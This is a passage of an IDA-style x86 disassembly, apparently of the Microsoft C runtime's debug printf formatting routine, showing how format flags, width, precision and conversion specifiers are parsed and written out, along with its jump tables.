movsx ecx, byte ptr [ebp+var_2C]
push ecx ; int
call _write_char
add esp, 0Ch
mov edx, [ebp+arg_4]
mov al, [edx]
mov byte ptr [ebp+var_2C], al
mov ecx, [ebp+arg_4]
add ecx, 1
mov [ebp+arg_4], ecx
loc_428E95: ; CODE XREF: sub_428D80+142�j
movsx edx, byte ptr [ebp+var_2C]
test edx, edx
jnz short loc_428EBE
push offset aCh_t0 ; "ch != _T('\\0')"
push 0 ; int
push 18Eh ; Value
push offset aOutput_c ; "output.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_428EBE
int 3 ; Trap to Debugger
loc_428EBE: ; CODE XREF: sub_428D80+11B�j
; sub_428D80+13B�j
xor eax, eax
test eax, eax
jnz short loc_428E95
loc_428EC4: ; CODE XREF: sub_428D80+EA�j
lea ecx, [ebp+var_230]
push ecx ; int
mov edx, [ebp+File]
push edx ; File
movsx eax, byte ptr [ebp+var_2C]
push eax ; int
call _write_char
add esp, 0Ch
jmp loc_429A29
; ---------------------------------------------------------------------------
loc_428EE1: ; CODE XREF: sub_428D80+C0�j
; DATA XREF: .text:00429A3F�o
mov [ebp+var_8], 0
mov ecx, [ebp+var_8]
mov [ebp+var_240], ecx
mov edx, [ebp+var_240]
mov [ebp+var_248], edx
mov eax, [ebp+var_248]
mov [ebp+var_14], eax
mov [ebp+var_4], 0
mov [ebp+Size], 0FFFFFFFFh
mov [ebp+var_20], 0
jmp loc_429A29
; ---------------------------------------------------------------------------
loc_428F23: ; CODE XREF: sub_428D80+C0�j
; DATA XREF: .text:00429A43�o
movsx ecx, byte ptr [ebp+var_2C]
mov [ebp+var_29C], ecx
mov edx, [ebp+var_29C]
sub edx, 20h
mov [ebp+var_29C], edx
cmp [ebp+var_29C], 10h
ja short loc_428F8D
mov ecx, [ebp+var_29C]
xor eax, eax
mov al, ds:byte_429A73[ecx]
jmp ds:off_429A5B[eax*4]
loc_428F5A: ; CODE XREF: sub_428D80+C0�j
; DATA XREF: .text:00429A67�o
mov edx, [ebp+var_4]
or edx, 4
mov [ebp+var_4], edx
jmp short loc_428F8D
; ---------------------------------------------------------------------------
loc_428F65: ; CODE XREF: sub_428D80+C0�j
; sub_428D80+1D3�j
; DATA XREF: ...
mov eax, [ebp+var_4]
or al, 1
mov [ebp+var_4], eax
jmp short loc_428F8D
; ---------------------------------------------------------------------------
loc_428F6F: ; CODE XREF: sub_428D80+C0�j
; sub_428D80+1D3�j
; DATA XREF: ...
mov ecx, [ebp+var_4]
or ecx, 2
mov [ebp+var_4], ecx
jmp short loc_428F8D
; ---------------------------------------------------------------------------
loc_428F7A: ; CODE XREF: sub_428D80+C0�j
; sub_428D80+1D3�j
; DATA XREF: ...
mov edx, [ebp+var_4]
or dl, 80h
mov [ebp+var_4], edx
jmp short loc_428F8D
; ---------------------------------------------------------------------------
loc_428F85: ; CODE XREF: sub_428D80+C0�j
; sub_428D80+1D3�j
; DATA XREF: ...
mov eax, [ebp+var_4]
or al, 8
mov [ebp+var_4], eax
loc_428F8D: ; CODE XREF: sub_428D80+C0�j
; sub_428D80+1C3�j ...
jmp loc_429A29
; ---------------------------------------------------------------------------
loc_428F92: ; CODE XREF: sub_428D80+C0�j
; DATA XREF: .text:00429A47�o
movsx ecx, byte ptr [ebp+var_2C]
cmp ecx, 2Ah
jnz short loc_428FCE
lea edx, [ebp+arg_8]
push edx
call _get_int_arg
add esp, 4
mov [ebp+var_248], eax
cmp [ebp+var_248], 0
jge short loc_428FCC
mov eax, [ebp+var_4]
or al, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_248]
neg ecx
mov [ebp+var_248], ecx
loc_428FCC: ; CODE XREF: sub_428D80+234�j
jmp short loc_428FE5
; ---------------------------------------------------------------------------
loc_428FCE: ; CODE XREF: sub_428D80+219�j
mov edx, [ebp+var_248]
imul edx, 0Ah
movsx eax, byte ptr [ebp+var_2C]
lea ecx, [edx+eax-30h]
mov [ebp+var_248], ecx
loc_428FE5: ; CODE XREF: sub_428D80:loc_428FCC�j
jmp loc_429A29
; ---------------------------------------------------------------------------
loc_428FEA: ; CODE XREF: sub_428D80+C0�j
; DATA XREF: .text:00429A4B�o
mov [ebp+Size], 0
jmp loc_429A29
; ---------------------------------------------------------------------------
loc_428FF9: ; CODE XREF: sub_428D80+C0�j
; DATA XREF: .text:00429A4F�o
movsx edx, byte ptr [ebp+var_2C]
cmp edx, 2Ah
jnz short loc_429029
lea eax, [ebp+arg_8]
push eax
call _get_int_arg
add esp, 4
mov [ebp+Size], eax
cmp [ebp+Size], 0
jge short loc_429027
mov [ebp+Size], 0FFFFFFFFh
loc_429027: ; CODE XREF: sub_428D80+29B�j
jmp short loc_429040
; ---------------------------------------------------------------------------
loc_429029: ; CODE XREF: sub_428D80+280�j
mov ecx, [ebp+Size]
imul ecx, 0Ah
movsx edx, byte ptr [ebp+var_2C]
lea eax, [ecx+edx-30h]
mov [ebp+Size], eax
loc_429040: ; CODE XREF: sub_428D80:loc_429027�j
jmp loc_429A29
; ---------------------------------------------------------------------------
loc_429045: ; CODE XREF: sub_428D80+C0�j
; DATA XREF: .text:00429A53�o
movsx ecx, byte ptr [ebp+var_2C]
mov [ebp+var_2A0], ecx
mov edx, [ebp+var_2A0]
sub edx, 49h
mov [ebp+var_2A0], edx
cmp [ebp+var_2A0], 2Eh
ja short loc_4290D3
mov ecx, [ebp+var_2A0]
xor eax, eax
mov al, ds:byte_429A98[ecx]
jmp ds:off_429A84[eax*4]
loc_42907C: ; DATA XREF: .text:00429A8C�o
mov edx, [ebp+var_4]
or edx, 10h
mov [ebp+var_4], edx
jmp short loc_4290D3
; ---------------------------------------------------------------------------
loc_429087: ; CODE XREF: sub_428D80+2F5�j
; DATA XREF: .text:off_429A84�o
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
cmp ecx, 36h
jnz short loc_4290B2
mov edx, [ebp+arg_4]
movsx eax, byte ptr [edx+1]
cmp eax, 34h
jnz short loc_4290B2
mov ecx, [ebp+arg_4]
add ecx, 2
mov [ebp+arg_4], ecx
mov edx, [ebp+var_4]
or dh, 80h
mov [ebp+var_4], edx
jmp short loc_4290BE
; ---------------------------------------------------------------------------
loc_4290B2: ; CODE XREF: sub_428D80+310�j
; sub_428D80+31C�j
mov [ebp+var_1C], 0
jmp loc_428E47
; ---------------------------------------------------------------------------
loc_4290BE: ; CODE XREF: sub_428D80+330�j
jmp short loc_4290D3
; ---------------------------------------------------------------------------
loc_4290C0: ; CODE XREF: sub_428D80+2F5�j
; DATA XREF: .text:00429A88�o
mov eax, [ebp+var_4]
or al, 20h
mov [ebp+var_4], eax
jmp short loc_4290D3
; ---------------------------------------------------------------------------
loc_4290CA: ; CODE XREF: sub_428D80+2F5�j
; DATA XREF: .text:00429A90�o
mov ecx, [ebp+var_4]
or ch, 8
mov [ebp+var_4], ecx
loc_4290D3: ; CODE XREF: sub_428D80+2E5�j
; sub_428D80+2F5�j ...
jmp loc_429A29
; ---------------------------------------------------------------------------
loc_4290D8: ; CODE XREF: sub_428D80+C0�j
; DATA XREF: .text:00429A57�o
movsx edx, byte ptr [ebp+var_2C]
mov [ebp+var_2A4], edx
mov eax, [ebp+var_2A4]
sub eax, 43h
mov [ebp+var_2A4], eax
cmp [ebp+var_2A4], 35h
ja loc_429833
mov edx, [ebp+var_2A4]
xor ecx, ecx
mov cl, ds:byte_429B03[edx]
jmp ds:off_429AC7[ecx*4]
loc_429113: ; DATA XREF: .text:off_429AC7�o
mov eax, [ebp+var_4]
and eax, 830h
test eax, eax
jnz short loc_429128
mov ecx, [ebp+var_4]
or ch, 8
mov [ebp+var_4], ecx
loc_429128: ; CODE XREF: sub_428D80+38C�j
; sub_428D80+39D�j
; DATA XREF: ...
mov edx, [ebp+var_4]
and edx, 810h
test edx, edx
jz short loc_42916E
lea eax, [ebp+arg_8]
push eax
call _get_short_arg
add esp, 4
mov [ebp+WCh], ax
mov cx, [ebp+WCh]
push ecx ; WCh
lea edx, [ebp+MbCh]
push edx ; MbCh
call _wctomb
add esp, 8
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jge short loc_42916C
mov [ebp+var_240], 1
loc_42916C: ; CODE XREF: sub_428D80+3E0�j
jmp short loc_429194
; ---------------------------------------------------------------------------
loc_42916E: ; CODE XREF: sub_428D80+3B3�j
lea eax, [ebp+arg_8]
push eax
call _get_int_arg
add esp, 4
mov [ebp+var_24C], ax
mov cl, byte ptr [ebp+var_24C]
mov [ebp+MbCh], cl
mov [ebp+var_28], 1
loc_429194: ; CODE XREF: sub_428D80:loc_42916C�j
lea edx, [ebp+MbCh]
mov [ebp+Str], edx
jmp loc_429833
; ---------------------------------------------------------------------------
loc_4291A2: ; CODE XREF: sub_428D80+38C�j
; DATA XREF: .text:00429AD7�o
lea eax, [ebp+arg_8]
push eax
call _get_int_arg
add esp, 4
mov [ebp+var_250], eax
cmp [ebp+var_250], 0
jz short loc_4291C9
mov ecx, [ebp+var_250]
cmp dword ptr [ecx+4], 0
jnz short loc_4291E3
loc_4291C9: ; CODE XREF: sub_428D80+43B�j
mov edx, off_45501C
mov [ebp+Str], edx
mov eax, [ebp+Str]
push eax ; Str
call _strlen
add esp, 4
mov [ebp+var_28], eax
jmp short loc_429232
; ---------------------------------------------------------------------------
loc_4291E3: ; CODE XREF: sub_428D80+447�j
mov ecx, [ebp+var_4]
and ecx, 800h
test ecx, ecx
jz short loc_429213
mov edx, [ebp+var_250]
mov eax, [edx+4]
mov [ebp+Str], eax
mov ecx, [ebp+var_250]
movsx edx, word ptr [ecx]
shr edx, 1
mov [ebp+var_28], edx
mov [ebp+var_20], 1
jmp short loc_429232
; ---------------------------------------------------------------------------
loc_429213: ; CODE XREF: sub_428D80+46E�j
mov [ebp+var_20], 0
mov eax, [ebp+var_250]
mov ecx, [eax+4]
mov [ebp+Str], ecx
mov edx, [ebp+var_250]
movsx eax, word ptr [edx]
mov [ebp+var_28], eax
loc_429232: ; CODE XREF: sub_428D80+461�j
; sub_428D80+491�j
jmp loc_429833
; ---------------------------------------------------------------------------
loc_429237: ; CODE XREF: sub_428D80+38C�j
; DATA XREF: .text:00429ACF�o
mov ecx, [ebp+var_4]
and ecx, 830h
test ecx, ecx
jnz short loc_42924D
mov edx, [ebp+var_4]
or dh, 8
mov [ebp+var_4], edx
loc_42924D: ; CODE XREF: sub_428D80+38C�j
; sub_428D80+4C2�j
; DATA XREF: ...
cmp [ebp+Size], 0FFFFFFFFh
jnz short loc_429262
mov [ebp+var_2A8], 7FFFFFFFh
jmp short loc_42926E
; ---------------------------------------------------------------------------
loc_429262: ; CODE XREF: sub_428D80+4D4�j
mov eax, [ebp+Size]
mov [ebp+var_2A8], eax
loc_42926E: ; CODE XREF: sub_428D80+4E0�j
mov ecx, [ebp+var_2A8]
mov [ebp+var_25C], ecx
lea edx, [ebp+arg_8]
push edx
call _get_int_arg
add esp, 4
mov [ebp+Str], eax
mov eax, [ebp+var_4]
and eax, 810h
test eax, eax
jz short loc_4292FD
cmp [ebp+Str], 0
jnz short loc_4292A4
mov ecx, off_455020
mov [ebp+Str], ecx
loc_4292A4: ; CODE XREF: sub_428D80+519�j
mov [ebp+var_20], 1
mov edx, [ebp+Str]
mov [ebp+var_258], edx
loc_4292B4: ; CODE XREF: sub_428D80+56B�j
mov eax, [ebp+var_25C]
mov ecx, [ebp+var_25C]
sub ecx, 1
mov [ebp+var_25C], ecx
test eax, eax
jz short loc_4292ED
mov edx, [ebp+var_258]
xor eax, eax
mov ax, [edx]
test eax, eax
jz short loc_4292ED
mov ecx, [ebp+var_258]
add ecx, 2
mov [ebp+var_258], ecx
jmp short loc_4292B4
; ---------------------------------------------------------------------------
loc_4292ED: ; CODE XREF: sub_428D80+54B�j
; sub_428D80+55A�j
mov edx, [ebp+var_258]
sub edx, [ebp+Str]
sar edx, 1
mov [ebp+var_28], edx
jmp short loc_429357
; ---------------------------------------------------------------------------
loc_4292FD: ; CODE XREF: sub_428D80+513�j
cmp [ebp+Str], 0
jnz short loc_42930B
mov eax, off_45501C
mov [ebp+Str], eax
loc_42930B: ; CODE XREF: sub_428D80+581�j
mov ecx, [ebp+Str]
mov [ebp+var_254], ecx
loc_429314: ; CODE XREF: sub_428D80+5C9�j
mov edx, [ebp+var_25C]
mov eax, [ebp+var_25C]
sub eax, 1
mov [ebp+var_25C], eax
test edx, edx
jz short loc_42934B
mov ecx, [ebp+var_254]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_42934B
mov eax, [ebp+var_254]
add eax, 1
mov [ebp+var_254], eax
jmp short loc_429314
; ---------------------------------------------------------------------------
loc_42934B: ; CODE XREF: sub_428D80+5AB�j
; sub_428D80+5B8�j
mov ecx, [ebp+var_254]
sub ecx, [ebp+Str]
mov [ebp+var_28], ecx
loc_429357: ; CODE XREF: sub_428D80+57B�j
jmp loc_429833
; ---------------------------------------------------------------------------
loc_42935C: ; CODE XREF: sub_428D80+38C�j
; DATA XREF: .text:00429AE7�o
lea edx, [ebp+arg_8]
push edx
call _get_int_arg
add esp, 4
mov [ebp+var_260], eax
mov eax, [ebp+var_4]
and eax, 20h
test eax, eax
jz short loc_42938A
mov ecx, [ebp+var_260]
mov dx, word ptr [ebp+var_230]
mov [ecx], dx
jmp short loc_429398
; ---------------------------------------------------------------------------
loc_42938A: ; CODE XREF: sub_428D80+5F6�j
mov eax, [ebp+var_260]
mov ecx, [ebp+var_230]
mov [eax], ecx
loc_429398: ; CODE XREF: sub_428D80+608�j
mov [ebp+var_240], 1
jmp loc_429833
; ---------------------------------------------------------------------------
loc_4293A7: ; CODE XREF: sub_428D80+38C�j
; DATA XREF: .text:00429ACB�o
mov [ebp+var_8], 1
mov dl, byte ptr [ebp+var_2C]
add dl, 20h
mov byte ptr [ebp+var_2C], dl
loc_4293B7: ; CODE XREF: sub_428D80+38C�j
; DATA XREF: .text:00429AE3�o
mov eax, [ebp+var_4]
or al, 40h
mov [ebp+var_4], eax
lea ecx, [ebp+MbCh]
mov [ebp+Str], ecx
cmp [ebp+Size], 0
jge short loc_4293DD
mov [ebp+Size], 6
jmp short loc_429411
; ---------------------------------------------------------------------------
loc_4293DD: ; CODE XREF: sub_428D80+64F�j
cmp [ebp+Size], 0
jnz short loc_4293FB
movsx edx, byte ptr [ebp+var_2C]
cmp edx, 67h
jnz short loc_4293FB
mov [ebp+Size], 1
jmp short loc_429411
; ---------------------------------------------------------------------------
loc_4293FB: ; CODE XREF: sub_428D80+664�j
; sub_428D80+66D�j
cmp [ebp+Size], 200h
jle short loc_429411
mov [ebp+Size], 200h
loc_429411: ; CODE XREF: sub_428D80+65B�j
; sub_428D80+679�j ...
cmp [ebp+Size], 0A3h
jle short loc_429458
push 2EAh
push offset aOutput_c ; "output.c"
push 2
mov eax, [ebp+Size]
add eax, 15Dh
push eax
call __malloc_dbg
add esp, 10h
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_42944E
mov ecx, [ebp+var_C]
mov [ebp+Str], ecx
jmp short loc_429458
; ---------------------------------------------------------------------------
loc_42944E: ; CODE XREF: sub_428D80+6C4�j
mov [ebp+Size], 0A3h
loc_429458: ; CODE XREF: sub_428D80+69B�j
; sub_428D80+6CC�j
mov edx, [ebp+arg_8]
add edx, 8
mov [ebp+arg_8], edx
mov eax, [ebp+arg_8]
sub eax, 8
mov ecx, [eax]
mov edx, [eax+4]
mov [ebp+var_268], ecx
mov [ebp+var_264], edx
mov eax, [ebp+var_8]
push eax ; int
mov ecx, [ebp+Size]
push ecx ; Size
movsx edx, byte ptr [ebp+var_2C]
push edx ; int
mov eax, [ebp+Str]
push eax ; int
lea ecx, [ebp+var_268]
push ecx ; int
call off_4553B0
add esp, 14h
mov edx, [ebp+var_4]
and edx, 80h
test edx, edx
jz short loc_4294BF
cmp [ebp+Size], 0
jnz short loc_4294BF
mov eax, [ebp+Str]
push eax
call off_4553BC
add esp, 4
loc_4294BF: ; CODE XREF: sub_428D80+727�j
; sub_428D80+730�j
movsx ecx, byte ptr [ebp+var_2C]
cmp ecx, 67h
jnz short loc_4294E2
mov edx, [ebp+var_4]
and edx, 80h
test edx, edx
jnz short loc_4294E2
mov eax, [ebp+Str]
push eax
call off_4553B4
add esp, 4
loc_4294E2: ; CODE XREF: sub_428D80+746�j
; sub_428D80+753�j
mov ecx, [ebp+Str]
movsx edx, byte ptr [ecx]
cmp edx, 2Dh
jnz short loc_4294FF
mov eax, [ebp+var_4]
or ah, 1
mov [ebp+var_4], eax
mov ecx, [ebp+Str]
add ecx, 1
mov [ebp+Str], ecx
loc_4294FF: ; CODE XREF: sub_428D80+76B�j
mov edx, [ebp+Str]
push edx ; Str
call _strlen
add esp, 4
mov [ebp+var_28], eax
jmp loc_429833
; ---------------------------------------------------------------------------
loc_429513: ; CODE XREF: sub_428D80+38C�j
; DATA XREF: .text:00429ADF�o
mov eax, [ebp+var_4]
or al, 40h
mov [ebp+var_4], eax
mov [ebp+var_23C], 0Ah
jmp loc_4295AB
; ---------------------------------------------------------------------------
loc_42952A: ; CODE XREF: sub_428D80+38C�j
; DATA XREF: .text:00429AF7�o
mov [ebp+var_23C], 0Ah
jmp short loc_4295AB
; ---------------------------------------------------------------------------
loc_429536: ; CODE XREF: sub_428D80+38C�j
; DATA XREF: .text:00429AEF�o
mov [ebp+Size], 8
loc_429540: ; CODE XREF: sub_428D80+38C�j
; DATA XREF: .text:00429AD3�o
mov [ebp+var_234], 7
jmp short loc_429556
; ---------------------------------------------------------------------------
loc_42954C: ; CODE XREF: sub_428D80+38C�j
; DATA XREF: .text:00429AFB�o
mov [ebp+var_234], 27h
loc_429556: ; CODE XREF: sub_428D80+7CA�j
mov [ebp+var_23C], 10h
mov ecx, [ebp+var_4]
and ecx, 80h
test ecx, ecx
jz short loc_42958A
mov byte ptr [ebp+var_244], 30h
mov edx, [ebp+var_234]
add edx, 51h
mov byte ptr [ebp+var_244+1], dl
mov [ebp+var_14], 2
loc_42958A: ; CODE XREF: sub_428D80+7EB�j
jmp short loc_4295AB
; ---------------------------------------------------------------------------
loc_42958C: ; CODE XREF: sub_428D80+38C�j
; DATA XREF: .text:00429AEB�o
mov [ebp+var_23C], 8
mov eax, [ebp+var_4]
and eax, 80h
test eax, eax
jz short loc_4295AB
mov ecx, [ebp+var_4]
or ch, 2
mov [ebp+var_4], ecx
loc_4295AB: ; CODE XREF: sub_428D80+7A5�j
; sub_428D80+7B4�j ...
mov edx, [ebp+var_4]
and edx, 8000h
test edx, edx
jz short loc_4295D5
lea eax, [ebp+arg_8]
push eax
call _get_int64_arg
add esp, 4
mov [ebp+var_27C], eax
mov [ebp+var_278], edx
jmp loc_429666
; ---------------------------------------------------------------------------
loc_4295D5: ; CODE XREF: sub_428D80+836�j
mov ecx, [ebp+var_4]
and ecx, 20h
test ecx, ecx
jz short loc_429627
mov edx, [ebp+var_4]
and edx, 40h
test edx, edx
jz short loc_429607
lea eax, [ebp+arg_8]
push eax
call _get_int_arg
add esp, 4
movsx eax, ax
cdq
mov [ebp+var_27C], eax
mov [ebp+var_278], edx
jmp short loc_429625
; ---------------------------------------------------------------------------
loc_429607: ; CODE XREF: sub_428D80+867�j
lea ecx, [ebp+arg_8]
push ecx
call _get_int_arg
add esp, 4
and eax, 0FFFFh
cdq
mov [ebp+var_27C], eax
mov [ebp+var_278], edx
loc_429625: ; CODE XREF: sub_428D80+885�j
jmp short loc_429666
; ---------------------------------------------------------------------------
loc_429627: ; CODE XREF: sub_428D80+85D�j
mov edx, [ebp+var_4]
and edx, 40h
test edx, edx
jz short loc_42964C
lea eax, [ebp+arg_8]
push eax
call _get_int_arg
add esp, 4
cdq
mov [ebp+var_27C], eax
mov [ebp+var_278], edx
jmp short loc_429666
; ---------------------------------------------------------------------------
loc_42964C: ; CODE XREF: sub_428D80+8AF�j
lea ecx, [ebp+arg_8]
push ecx
call _get_int_arg
add esp, 4
xor edx, edx
mov [ebp+var_27C], eax
mov [ebp+var_278], edx
loc_429666: ; CODE XREF: sub_428D80+850�j
; sub_428D80:loc_429625�j ...
mov eax, [ebp+var_4]
and eax, 40h
test eax, eax
jz short loc_4296AE
cmp [ebp+var_278], 0
jg short loc_4296AE
jl short loc_429684
cmp [ebp+var_27C], 0
jnb short loc_4296AE
loc_429684: ; CODE XREF: sub_428D80+8F9�j
mov ecx, [ebp+var_27C]
neg ecx
mov edx, [ebp+var_278]
adc edx, 0
neg edx
mov [ebp+var_270], ecx
mov [ebp+var_26C], edx
mov eax, [ebp+var_4]
or ah, 1
mov [ebp+var_4], eax
jmp short loc_4296C6
; ---------------------------------------------------------------------------
loc_4296AE: ; CODE XREF: sub_428D80+8EE�j
; sub_428D80+8F7�j ...
mov ecx, [ebp+var_27C]
mov [ebp+var_270], ecx
mov edx, [ebp+var_278]
mov [ebp+var_26C], edx
loc_4296C6: ; CODE XREF: sub_428D80+92C�j
mov eax, [ebp+var_4]
and eax, 8000h
test eax, eax
jnz short loc_4296ED
mov ecx, [ebp+var_270]
mov edx, [ebp+var_26C]
and edx, 0
mov [ebp+var_270], ecx
mov [ebp+var_26C], edx
loc_4296ED: ; CODE XREF: sub_428D80+950�j
cmp [ebp+Size], 0
jge short loc_429702
mov [ebp+Size], 1
jmp short loc_429720
; ---------------------------------------------------------------------------
loc_429702: ; CODE XREF: sub_428D80+974�j
mov eax, [ebp+var_4]
and al, 0F7h
mov [ebp+var_4], eax
cmp [ebp+Size], 200h
jle short loc_429720
mov [ebp+Size], 200h
loc_429720: ; CODE XREF: sub_428D80+980�j
; sub_428D80+994�j
mov ecx, [ebp+var_270]
or ecx, [ebp+var_26C]
test ecx, ecx
jnz short loc_429737
mov [ebp+var_14], 0
loc_429737: ; CODE XREF: sub_428D80+9AE�j
lea edx, [ebp+var_2D]
mov [ebp+Str], edx
loc_42973D: ; CODE XREF: sub_428D80+A66�j
mov eax, [ebp+Size]
mov ecx, [ebp+Size]
sub ecx, 1
mov [ebp+Size], ecx
test eax, eax
jg short loc_42976A
mov edx, [ebp+var_270]
or edx, [ebp+var_26C]
test edx, edx
jz loc_4297EB
loc_42976A: ; CODE XREF: sub_428D80+9D4�j
mov eax, [ebp+var_23C]
cdq
push edx
push eax
mov eax, [ebp+var_26C]
push eax
mov ecx, [ebp+var_270]
push ecx
call __aullrem
add eax, 30h
mov [ebp+var_274], eax
mov eax, [ebp+var_23C]
cdq
push edx
push eax
mov edx, [ebp+var_26C]
push edx
mov eax, [ebp+var_270]
push eax
call __aulldiv
mov [ebp+var_270], eax
mov [ebp+var_26C], edx
cmp [ebp+var_274], 39h
jle short loc_4297D2
mov ecx, [ebp+var_274]
add ecx, [ebp+var_234]
mov [ebp+var_274], ecx
loc_4297D2: ; CODE XREF: sub_428D80+A3E�j
mov edx, [ebp+Str]
mov al, byte ptr [ebp+var_274]
mov [edx], al
mov ecx, [ebp+Str]
sub ecx, 1
mov [ebp+Str], ecx
jmp loc_42973D
; ---------------------------------------------------------------------------
loc_4297EB: ; CODE XREF: sub_428D80+9E4�j
lea edx, [ebp+var_2D]
sub edx, [ebp+Str]
mov [ebp+var_28], edx
mov eax, [ebp+Str]
add eax, 1
mov [ebp+Str], eax
mov ecx, [ebp+var_4]
and ecx, 200h
test ecx, ecx
jz short loc_429833
mov edx, [ebp+Str]
movsx eax, byte ptr [edx]
cmp eax, 30h
jnz short loc_42981B
cmp [ebp+var_28], 0
jnz short loc_429833
loc_42981B: ; CODE XREF: sub_428D80+A93�j
mov ecx, [ebp+Str]
sub ecx, 1
mov [ebp+Str], ecx
mov edx, [ebp+Str]
mov byte ptr [edx], 30h
mov eax, [ebp+var_28]
add eax, 1
mov [ebp+var_28], eax
loc_429833: ; CODE XREF: sub_428D80+378�j
; sub_428D80+38C�j ...
cmp [ebp+var_240], 0
jnz loc_429A0E
mov ecx, [ebp+var_4]
and ecx, 40h
test ecx, ecx
jz short loc_429899
mov edx, [ebp+var_4]
and edx, 100h
test edx, edx
jz short loc_429867
mov byte ptr [ebp+var_244], 2Dh
mov [ebp+var_14], 1
jmp short loc_429899
; ---------------------------------------------------------------------------
loc_429867: ; CODE XREF: sub_428D80+AD5�j
mov eax, [ebp+var_4]
and eax, 1
test eax, eax
jz short loc_429881
mov byte ptr [ebp+var_244], 2Bh
mov [ebp+var_14], 1
jmp short loc_429899
; ---------------------------------------------------------------------------
loc_429881: ; CODE XREF: sub_428D80+AEF�j
mov ecx, [ebp+var_4]
and ecx, 2
test ecx, ecx
jz short loc_429899
mov byte ptr [ebp+var_244], 20h
mov [ebp+var_14], 1
loc_429899: ; CODE XREF: sub_428D80+AC8�j
; sub_428D80+AE5�j ...
mov edx, [ebp+var_248]
sub edx, [ebp+var_28]
sub edx, [ebp+var_14]
mov [ebp+var_280], edx
mov eax, [ebp+var_4]
and eax, 0Ch
test eax, eax
jnz short loc_4298D1
lea ecx, [ebp+var_230]
push ecx ; int
mov edx, [ebp+File]
push edx ; File
mov eax, [ebp+var_280]
push eax ; int
push 20h ; int
call _write_multi_char
add esp, 10h
loc_4298D1: ; CODE XREF: sub_428D80+B33�j
lea ecx, [ebp+var_230]
push ecx ; int
mov edx, [ebp+File]
push edx ; File
mov eax, [ebp+var_14]
push eax ; int
lea ecx, [ebp+var_244]
push ecx ; int
call _write_string
add esp, 10h
mov edx, [ebp+var_4]
and edx, 8
test edx, edx
jz short loc_42991F
mov eax, [ebp+var_4]
and eax, 4
test eax, eax
jnz short loc_42991F
lea ecx, [ebp+var_230]
push ecx ; int
mov edx, [ebp+File]
push edx ; File
mov eax, [ebp+var_280]
push eax ; int
push 30h ; int
call _write_multi_char
add esp, 10h
loc_42991F: ; CODE XREF: sub_428D80+B77�j
; sub_428D80+B81�j
cmp [ebp+var_20], 0
jz loc_4299CD
cmp [ebp+var_28], 0
jle loc_4299CD
mov ecx, [ebp+Str]
mov [ebp+var_284], ecx
mov edx, [ebp+var_28]
mov [ebp+var_288], edx
loc_429945: ; CODE XREF: sub_428D80+C46�j
mov eax, [ebp+var_288]
mov ecx, [ebp+var_288]
sub ecx, 1
mov [ebp+var_288], ecx
test eax, eax
jz short loc_4299CB
mov edx, [ebp+var_284]
mov ax, [edx]
mov [ebp+var_2AA], ax
mov cx, [ebp+var_2AA]
push ecx ; WCh
lea edx, [ebp+var_28C]
push edx ; MbCh
mov eax, [ebp+var_284]
add eax, 2
mov [ebp+var_284], eax
call _wctomb
add esp, 8
mov [ebp+var_290], eax
cmp [ebp+var_290], 0
jg short loc_4299A5
jmp short loc_4299CB
; ---------------------------------------------------------------------------
loc_4299A5: ; CODE XREF: sub_428D80+C21�j
lea ecx, [ebp+var_230]
push ecx ; int
mov edx, [ebp+File]
push edx ; File
mov eax, [ebp+var_290]
push eax ; int
lea ecx, [ebp+var_28C]
push ecx ; int
call _write_string
add esp, 10h
jmp loc_429945
; ---------------------------------------------------------------------------
loc_4299CB: ; CODE XREF: sub_428D80+BDC�j
; sub_428D80+C23�j
jmp short loc_4299E8
; ---------------------------------------------------------------------------
loc_4299CD: ; CODE XREF: sub_428D80+BA3�j
; sub_428D80+BAD�j
lea edx, [ebp+var_230]
push edx ; int
mov eax, [ebp+File]
push eax ; File
mov ecx, [ebp+var_28]
push ecx ; int
mov edx, [ebp+Str]
push edx ; int
call _write_string
add esp, 10h
loc_4299E8: ; CODE XREF: sub_428D80:loc_4299CB�j
mov eax, [ebp+var_4]
and eax, 4
test eax, eax
jz short loc_429A0E
lea ecx, [ebp+var_230]
push ecx ; int
mov edx, [ebp+File]
push edx ; File
mov eax, [ebp+var_280]
push eax ; int
push 20h ; int
call _write_multi_char
add esp, 10h
loc_429A0E: ; CODE XREF: sub_428D80+ABA�j
; sub_428D80+C70�j
cmp [ebp+var_C], 0
jz short loc_429A29
push 2
mov ecx, [ebp+var_C]
push ecx
call __free_dbg
add esp, 8
mov [ebp+var_C], 0
loc_429A29: ; CODE XREF: sub_428D80+B4�j
; sub_428D80+15C�j ...
jmp loc_428DAB
; ---------------------------------------------------------------------------
loc_429A2E: ; CODE XREF: sub_428D80+42�j
; sub_428D80+4F�j
mov eax, [ebp+var_230]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_428D80 endp
; ---------------------------------------------------------------------------
off_429A3B dd offset loc_428E47 ; DATA XREF: sub_428D80+C0�r
dd offset loc_428EE1
dd offset loc_428F23
dd offset loc_428F92
dd offset loc_428FEA
dd offset loc_428FF9
dd offset loc_429045
dd offset loc_4290D8
off_429A5B dd offset loc_428F6F ; DATA XREF: sub_428D80+1D3�r
dd offset loc_428F7A
dd offset loc_428F65
dd offset loc_428F5A
dd offset loc_428F85
dd offset loc_428F8D
byte_429A73 db 0 ; DATA XREF: sub_428D80+1CD�r
dd 5010505h, 5050505h, 5020505h, 4050503h
off_429A84 dd offset loc_429087 ; DATA XREF: sub_428D80+2F5�r
dd offset loc_4290C0
dd offset loc_42907C
dd offset loc_4290CA
dd offset loc_4290D3
byte_429A98 db 0 ; DATA XREF: sub_428D80+2EF�r
db 3 dup(4)
dd 6 dup(4040404h), 1040404h, 2040404h, 2 dup(4040404h)
db 2 dup(4), 3
off_429AC7 dd offset loc_429113 ; DATA XREF: sub_428D80+38C�r
dd offset loc_4293A7
dd offset loc_429237
dd offset loc_429540
dd offset loc_4291A2
dd offset loc_429128
dd offset loc_429513
dd offset loc_4293B7
dd offset loc_42935C
dd offset loc_42958C
dd offset loc_429536
dd offset loc_42924D
dd offset loc_42952A
dd offset loc_42954C
dd offset loc_429833
byte_429B03 db 0 ; DATA XREF: sub_428D80+386�r
dd 10E010Eh, 2 dup(0E0E0E0Eh), 20E0E0Eh, 0E0E0E0Eh, 0E040E03h
